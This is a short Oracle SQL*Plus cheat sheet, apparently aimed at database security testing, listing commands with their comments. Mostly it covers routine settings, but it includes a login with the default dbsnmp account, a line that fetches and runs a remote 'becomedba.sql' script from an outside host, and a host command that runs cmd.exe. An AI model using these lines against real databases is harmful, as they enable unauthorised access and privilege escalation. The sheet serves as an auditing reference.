Oracle Cheat SQLPlus Commands
Oracle Cheat SQLPlus Commands
dbsmp/dbsnmp@192.168.2.112:1521/orcl works only with Oracle 10g/11g clients SQL*Plus-Commands: @http://www.orasploit.com/becomedba.sql show parameter show parameter audit set term off set term on Set heading off Set pagesize 0 Set timing on Set autocommit on host cmd.exe /c 0wned > c:\rds8.txt set serveroutput on spool c:\myspool.txt desc utl_http desc all_users
-- execute a SQL Script from a HTTP server (FTP is also possible) -- show all parameters of the database -- show audit settings -- disable terminal output -- enable terminal output -- disable headlines -- disable pagesize -- show execution time -- commit everything after every command (!dangerous!) -- run OS commands from sqlplus (on the client), Instead of host the shortcuts ! (unix) or $ (Windows) are also possible -- enable output from dbms_output -- create a logfile of the SQL*Plus Session called myspool.txt (disable: spool off) -- show package specification of utl_http -- show view specification of all_users